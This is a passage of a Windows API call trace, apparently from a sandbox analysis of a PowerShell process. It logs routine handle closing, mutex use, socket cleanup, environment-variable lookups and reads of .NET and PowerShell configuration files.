0x0 [0138.224] RegCloseKey (hKey=0x35c) returned 0x0 [0138.224] RegCloseKey (hKey=0x358) returned 0x0 [0138.225] RegCloseKey (hKey=0x354) returned 0x0 [0138.225] RegCloseKey 
(hKey=0x39c) returned 0x0 [0138.225] RegCloseKey (hKey=0x398) returned 0x0 [0138.225] RegCloseKey (hKey=0x344) returned 0x0 [0138.226] RegCloseKey (hKey=0x340) returned 0x0 [0138.226] RegCloseKey (hKey=0x33c) returned 0x0 [0138.226] RegCloseKey (hKey=0x338) returned 0x0 [0138.227] RegCloseKey (hKey=0x334) returned 0x0 [0138.227] RegCloseKey (hKey=0x330) returned 0x0 [0138.228] RegCloseKey (hKey=0x320) returned 0x0 [0138.228] RegCloseKey (hKey=0x308) returned 0x0 [0138.228] RegCloseKey (hKey=0x304) returned 0x0 [0138.228] RegCloseKey (hKey=0x394) returned 0x0 [0138.229] RegCloseKey (hKey=0x390) returned 0x0 [0138.229] RegCloseKey (hKey=0x370) returned 0x0 [0138.229] RegCloseKey (hKey=0x3a4) returned 0x0 [0140.478] RegCloseKey (hKey=0x398) returned 0x0 [0152.448] LocalFree (hMem=0x10cee0) returned 0x0 [0152.448] LocalFree (hMem=0x10cdd0) returned 0x0 [0152.449] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5d708, cbSid=0x1b50eff0 | out: pSid=0x2f5d708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.450] CreateMutexW (lpMutexAttributes=0x2f5d8c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.450] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.450] ReleaseMutex (hMutex=0x39c) returned 1 [0152.450] CloseHandle (hObject=0x39c) returned 1 [0152.450] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5dc18, cbSid=0x1b50eff0 | out: pSid=0x2f5dc18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.451] CreateMutexW (lpMutexAttributes=0x2f5ddd0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.451] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.451] ReleaseMutex 
(hMutex=0x39c) returned 1 [0152.451] CloseHandle (hObject=0x39c) returned 1 [0152.451] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5e128, cbSid=0x1b50eff0 | out: pSid=0x2f5e128*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.451] CreateMutexW (lpMutexAttributes=0x2f5e2e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.452] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.452] ReleaseMutex (hMutex=0x39c) returned 1 [0152.452] CloseHandle (hObject=0x39c) returned 1 [0152.452] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5e638, cbSid=0x1b50eff0 | out: pSid=0x2f5e638*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50eff0) returned 1 [0152.452] CreateMutexW (lpMutexAttributes=0x2f5e7f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.452] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.452] ReleaseMutex (hMutex=0x39c) returned 1 [0152.453] CloseHandle (hObject=0x39c) returned 1 [0152.453] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f5eb48, cbSid=0x1b50f020 | out: pSid=0x2f5eb48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b50f020) returned 1 [0152.453] CreateMutexW (lpMutexAttributes=0x2f5ed00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x39c [0152.453] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0x1f4) returned 0x0 [0152.453] ReleaseMutex (hMutex=0x39c) returned 1 [0152.453] CloseHandle (hObject=0x39c) returned 1 [0152.462] DeregisterEventSource (hEventLog=0x1b900008) returned 1 [0152.469] setsockopt (s=0x4f8, level=65535, 
optname=128, optval="\x01", optlen=4) returned 0 [0152.469] closesocket (s=0x4f8) returned 0 [0152.479] CloseHandle (hObject=0x434) returned 1 [0152.479] CloseHandle (hObject=0x430) returned 1 [0152.480] CloseHandle (hObject=0x3e8) returned 1 [0152.480] CloseHandle (hObject=0x3e4) returned 1 [0152.480] CloseHandle (hObject=0x3e0) returned 1 [0152.481] CloseHandle (hObject=0x3dc) returned 1 [0152.481] CloseHandle (hObject=0x3d8) returned 1 [0152.482] CloseHandle (hObject=0x594) returned 1 [0152.482] CloseHandle (hObject=0x3cc) returned 1 [0152.482] CloseHandle (hObject=0x3c8) returned 1 [0152.483] CloseHandle (hObject=0x3c4) returned 1 [0152.483] CloseHandle (hObject=0x3c0) returned 1 [0152.484] CloseHandle (hObject=0x3b8) returned 1 [0152.484] CloseHandle (hObject=0x398) returned 1 [0152.484] CloseHandle (hObject=0x3bc) returned 1 [0152.485] CloseHandle (hObject=0x590) returned 1 [0152.485] CloseHandle (hObject=0x58c) returned 1 [0152.485] CloseHandle (hObject=0x588) returned 1 [0152.486] setsockopt (s=0x50c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.486] closesocket (s=0x50c) returned 0 [0152.487] CloseHandle (hObject=0x510) returned 1 [0152.487] setsockopt (s=0x500, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.487] closesocket (s=0x500) returned 0 [0152.488] CloseHandle (hObject=0x508) returned 1 [0152.488] CloseHandle (hObject=0x584) returned 1 [0152.488] CloseHandle (hObject=0x580) returned 1 [0152.488] CloseHandle (hObject=0x540) returned 1 [0152.489] CloseHandle (hObject=0x570) returned 1 [0152.489] CloseHandle (hObject=0x52c) returned 1 [0152.489] CloseHandle (hObject=0x4e4) returned 1 [0152.490] CloseHandle (hObject=0x4e0) returned 1 [0152.490] CloseHandle (hObject=0x488) returned 1 [0152.490] CloseHandle (hObject=0x484) returned 1 [0152.491] CloseHandle (hObject=0x480) returned 1 [0152.491] CloseHandle (hObject=0x47c) returned 1 [0152.491] RegCloseKey (hKey=0x478) returned 0x0 [0152.492] CloseHandle 
(hObject=0x474) returned 1 [0152.492] RegCloseKey (hKey=0x470) returned 0x0 [0152.493] CloseHandle (hObject=0x46c) returned 1 [0152.493] RegCloseKey (hKey=0x468) returned 0x0 [0152.493] RegCloseKey (hKey=0x464) returned 0x0 [0152.493] CloseHandle (hObject=0x3b4) returned 1 [0152.494] CloseHandle (hObject=0x44c) returned 1 [0152.494] setsockopt (s=0x444, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.494] closesocket (s=0x444) returned 0 [0152.495] CloseHandle (hObject=0x448) returned 1 [0152.495] CloseHandle (hObject=0x344) returned 1 [0152.495] setsockopt (s=0x438, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0152.495] closesocket (s=0x438) returned 0 [0152.496] CloseHandle (hObject=0x440) returned 1 [0152.496] CloseHandle (hObject=0x340) returned 1 [0152.496] CloseHandle (hObject=0x33c) returned 1 [0152.496] CloseHandle (hObject=0x338) returned 1 [0152.497] CloseHandle (hObject=0x334) returned 1 [0152.497] CloseHandle (hObject=0x330) returned 1 [0152.497] CloseHandle (hObject=0x320) returned 1 [0152.498] CloseHandle (hObject=0x308) returned 1 [0152.498] CloseHandle (hObject=0x304) returned 1 [0152.498] CloseHandle (hObject=0x394) returned 1 [0152.498] CloseHandle (hObject=0x390) returned 1 [0152.499] CloseHandle (hObject=0x370) returned 1 [0152.499] CloseHandle (hObject=0x3a4) returned 1 [0152.499] CloseHandle (hObject=0x524) returned 1 [0152.499] CloseHandle (hObject=0x4f4) returned 1 [0152.500] CloseHandle (hObject=0x51c) returned 1 [0152.500] CloseHandle (hObject=0x520) returned 1 [0152.500] CloseHandle (hObject=0x57c) returned 1 [0152.501] UnmapViewOfFile (lpBaseAddress=0x2ab0000) returned 1 [0152.502] CloseHandle (hObject=0x328) returned 1 [0152.502] CloseHandle (hObject=0x43c) returned 1 [0152.503] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0152.503] CloseHandle (hObject=0x2ec) returned 1 [0152.503] CloseHandle (hObject=0x31c) returned 1 [0152.503] UnmapViewOfFile (lpBaseAddress=0x28a0000) returned 1 Thread: 
id = 49 os_tid = 0x824 [0138.636] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0138.640] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1c78ef18*=0x39c, lpdwindex=0x1c78ec30 | out: lpdwindex=0x1c78ec30) returned 0x0 [0138.665] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0138.675] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.675] CoTaskMemFree (pv=0x10cff0) [0138.677] VirtualQuery (in: lpAddress=0x1c78db30, lpBuffer=0x1c78e9f0, dwLength=0x30 | out: lpBuffer=0x1c78e9f0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.694] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.694] CoTaskMemFree (pv=0x10cff0) [0138.698] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.698] CoTaskMemFree (pv=0x10cff0) [0138.702] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.702] CoTaskMemFree (pv=0x10cff0) [0138.720] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.720] CoTaskMemFree (pv=0x10cff0) [0138.723] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.723] CoTaskMemFree (pv=0x10cff0) [0138.724] 
CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.725] CoTaskMemFree (pv=0x10cff0) [0138.746] VirtualQuery (in: lpAddress=0x1c78dde0, lpBuffer=0x1c78eca0, dwLength=0x30 | out: lpBuffer=0x1c78eca0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.747] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.747] CoTaskMemFree (pv=0x10cff0) [0138.751] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.751] CoTaskMemFree (pv=0x10cff0) [0138.752] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.752] CoTaskMemFree (pv=0x10cff0) [0138.754] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.754] CoTaskMemFree (pv=0x10cff0) [0138.764] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.764] CoTaskMemFree (pv=0x10cff0) [0138.896] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.896] CoTaskMemFree (pv=0x10cff0) [0138.900] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: 
lpBuffer="") returned 0x0 [0138.900] CoTaskMemFree (pv=0x10cff0) [0138.902] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.903] CoTaskMemFree (pv=0x10cff0) [0138.907] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.908] CoTaskMemFree (pv=0x10cff0) [0138.909] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.910] CoTaskMemFree (pv=0x10cff0) [0138.912] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.912] CoTaskMemFree (pv=0x10cff0) [0138.915] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.915] CoTaskMemFree (pv=0x10cff0) [0138.946] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.946] CoTaskMemFree (pv=0x10cff0) [0138.959] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0138.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.959] CoTaskMemFree (pv=0x10cff0) [0139.017] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0139.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.018] CoTaskMemFree (pv=0x10cff0) [0139.034] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0139.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: 
lpBuffer="") returned 0x0 [0139.034] CoTaskMemFree (pv=0x10cff0) [0139.041] CoTaskMemAlloc (cb=0x104) returned 0x10cff0 [0139.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10cff0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.042] CoTaskMemFree (pv=0x10cff0) [0140.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.256] CoTaskMemAlloc (cb=0x20c) returned 0x1b819f30 [0140.256] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b819f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0140.257] CoTaskMemFree (pv=0x1b819f30) [0140.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c78d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0140.268] GetCurrentProcess () returned 0xffffffffffffffff [0140.268] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d778 | out: TokenHandle=0x1c78d778*=0x3b4) returned 1 [0140.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c78d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0140.271] 
GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d820 | out: lpFileInformation=0x1c78d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0140.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c78d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0140.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d7d0 | out: lpFileInformation=0x1c78d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0140.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c78d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0140.274] SetErrorMode (uMode=0x1) returned 0x1 [0140.274] CreateFileW 
(lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3bc [0140.274] GetFileType (hFile=0x3bc) returned 0x1 [0140.274] SetErrorMode (uMode=0x1) returned 0x1 [0140.274] GetFileType (hFile=0x3bc) returned 0x1 [0140.276] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x1c78d7c8 | out: lpFileSizeHigh=0x1c78d7c8*=0x0) returned 0x65b3 [0140.276] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d6e8*=0x1000, lpOverlapped=0x0) returned 1 [0140.283] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d3c8*=0x1000, lpOverlapped=0x0) returned 1 [0140.283] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d218, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d218*=0x1000, lpOverlapped=0x0) returned 1 [0140.284] ReadFile (in: hFile=0x3bc, lpBuffer=0x2fc09f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c78d218, lpOverlapped=0x0 | out: lpBuffer=0x2fc09f0*, lpNumberOfBytesRead=0x1c78d218*=0x1000, lpOverlapped=0x0) returned 1 [0140.481] CloseHandle (hObject=0x3bc) returned 1 [0140.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", 
nBufferLength=0x105, lpBuffer=0x1c78d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.482] CoTaskMemAlloc (cb=0x20c) returned 0x1b819f30 [0140.482] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b819f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0140.482] CoTaskMemFree (pv=0x1b819f30) [0140.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c78d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0140.483] GetCurrentProcess () returned 0xffffffffffffffff [0140.483] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x3bc) returned 1 [0140.483] GetCurrentProcess () returned 0xffffffffffffffff [0140.483] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x398) returned 1 [0140.484] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d778 | out: TokenHandle=0x1c78d778*=0x3b8) returned 1 [0140.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d820 | out: lpFileInformation=0x1c78d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0140.485] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c78d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0140.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c78d7d0 | out: lpFileInformation=0x1c78d7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0140.485] GetCurrentProcess () returned 0xffffffffffffffff [0140.486] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x3c0) returned 1 [0140.486] GetCurrentProcess () returned 0xffffffffffffffff [0140.486] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d9d8 | out: TokenHandle=0x1c78d9d8*=0x3c4) returned 1 [0140.490] GetCurrentProcess () returned 0xffffffffffffffff [0140.490] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d658 | out: TokenHandle=0x1c78d658*=0x3c8) returned 1 [0140.506] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d658 | out: TokenHandle=0x1c78d658*=0x3cc) returned 1 [0140.518] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0140.518] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0140.532] GetCurrentProcess () returned 0xffffffffffffffff [0140.532] OpenProcessToken (in: 
ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d628 | out: TokenHandle=0x1c78d628*=0x3d8) returned 1 [0140.540] GetCurrentProcess () returned 0xffffffffffffffff [0140.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d628 | out: TokenHandle=0x1c78d628*=0x3dc) returned 1 [0140.548] GetCurrentProcess () returned 0xffffffffffffffff [0140.548] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d568 | out: TokenHandle=0x1c78d568*=0x3e0) returned 1 [0140.549] GetCurrentProcess () returned 0xffffffffffffffff [0140.549] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d568 | out: TokenHandle=0x1c78d568*=0x3e4) returned 1 [0140.551] GetCurrentProcess () returned 0xffffffffffffffff [0140.551] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78dba8 | out: TokenHandle=0x1c78dba8*=0x3e8) returned 1 [0140.555] CoTaskMemAlloc (cb=0x12) returned 0x1b84a600 [0140.555] RegQueryValueExW (in: hKey=0x3ec, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c78bbbc, lpData=0x1b84a600, lpcbData=0x1c78bbb8*=0xe | out: lpType=0x1c78bbbc*=0x1, lpData="Client", lpcbData=0x1c78bbb8*=0xe) returned 0x0 [0140.555] CoTaskMemFree (pv=0x1b84a600) [0140.555] RegCloseKey (hKey=0x3ec) returned 0x0 [0140.562] CoTaskMemAlloc (cb=0xcd0) returned 